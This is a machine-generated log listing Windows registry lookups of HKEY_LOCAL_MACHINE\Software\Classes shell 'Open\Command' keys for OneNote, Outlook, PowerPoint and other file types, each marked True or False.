Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.LinkedNotes.14\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteAnchor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteAnchorCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Notebook\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Notebook.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkContentService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkMeta\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkStoreService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.OutlookAddin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Package\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.PowerPointAddinTakeNotesButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.PowerPointAddinTakeNotesService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Section\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Section.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.TableOfContents\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.TableOfContents.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.URL.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.WordAddinTakeNotesButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.WordAddinTakeNotesService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNoteDesktop\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNoteDesktop.URL.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OPCFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchblocked\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchdescription\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchfilefolderresult\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OpenSearchProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchresult\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\oqyfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OrgPlusWOPX.4\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OscAddin.Connect\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OscAddin.SharePointProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSE.Global\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.OsfAxControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.RemoterProxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.Sandbox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.SandboxContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiTokenActivationSigner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiTokenActivationSigner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otkloadr.WRAssembly\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otkloadr.WRLoader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlMapiPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Envelope\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.det.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.eml.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.fdm.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.hol.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ics.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.msg.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.nk2.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.nst.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ofs.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.oft.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ost.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.otm.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.pab.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.pst.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.vcf.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.vcs.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.FileAttach\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.MsgAttach\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkBusinessCardControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkBusinessCardControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCategoryStrip\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCategoryStrip.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCheckBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCheckBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkComboBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkComboBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCommandButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCommandButton.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkContactPhoto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkContactPhoto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkDateControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkDateControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkFrameHeader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkFrameHeader.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkInfoBar\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkInfoBar.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkLabel\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkLabel.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkListBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkListBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkOptionButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkOptionButton.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkPageControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkPageControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkSenderPhoto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkSenderPhoto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTextBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTextBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeZone\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeZone.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Search.MAPI16Handler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.feed.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.mailto.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.stssync.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.webcal.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlPOPPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlSMTPPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\outlspam.SmartScreenFactoryOutlook\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OVCtl.OVCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OVCtl.OVCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OWS.PostData\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P10File\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7MFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7RFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7SFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Package\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Package2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Paint.Picture\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PairingFolderItem\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PairingFolderItemBluetooth\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\partition\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Pathname\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pbkfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PBrush\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PCBFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFPrevHndlr.PDFPreviewHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFPrevHndlr.PDFPreviewHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShell.PDFShell\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShell.PDFShell.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo2.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Pdump.ProcessDump\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDXFileType\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerDraw.PeerDraw\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerDraw.PeerDraw.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerFactory.PeerFactory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerFactory.PeerFactory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcManager.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcManager.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcSurrogate.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcSurrogate.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenInputPanel.PenInputPanel\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenInputPanel.PenInputPanel.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PerfFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pfmfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PFXFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Bitmap\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.JFIF\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Jpeg\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Png\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Tiff\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Wdp\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\piffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pjpegfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PKOFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProviderCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProviderCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pnffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pngfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PNGFilter.CoPNGFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PNGFilter.CoPNGFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDevice.PortableDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDevice.PortableDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceClassExtension.PortableDeviceClassExtension\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceClassExtension.PortableDeviceClassExtension.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceFTM.PortableDeviceFTM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceFTM.PortableDeviceFTM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceManager.PortableDeviceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceManager.PortableDeviceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceService.PortableDeviceService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceService.PortableDeviceService.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceServiceFTM.PortableDeviceServiceFTM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceServiceFTM.PortableDeviceServiceFTM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValues.PortableDeviceValues\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValues.PortableDeviceValues.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValuesCollection.PortableDeviceValuesCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValuesCollection.PortableDeviceValuesCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWiaCompat.PortableDeviceWiaCompat\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWiaCompat.PortableDeviceWiaCompat.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWMDRM.PortableDeviceWMDRM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWMDRM.PortableDeviceWMDRM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortalConnect14.PersonalSite\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortalConnect14.PersonalSite.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.OpenDocumentPresentation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.OpenDocumentPresentation.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.ShowMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.ShowMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShowMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShowMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Template.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.TemplateMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.TemplateMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.UriLink.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Wizard.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointhtmlfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointhtmltemplate\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointmhtmlfile\Shell\Open\Command - False 1
Fn
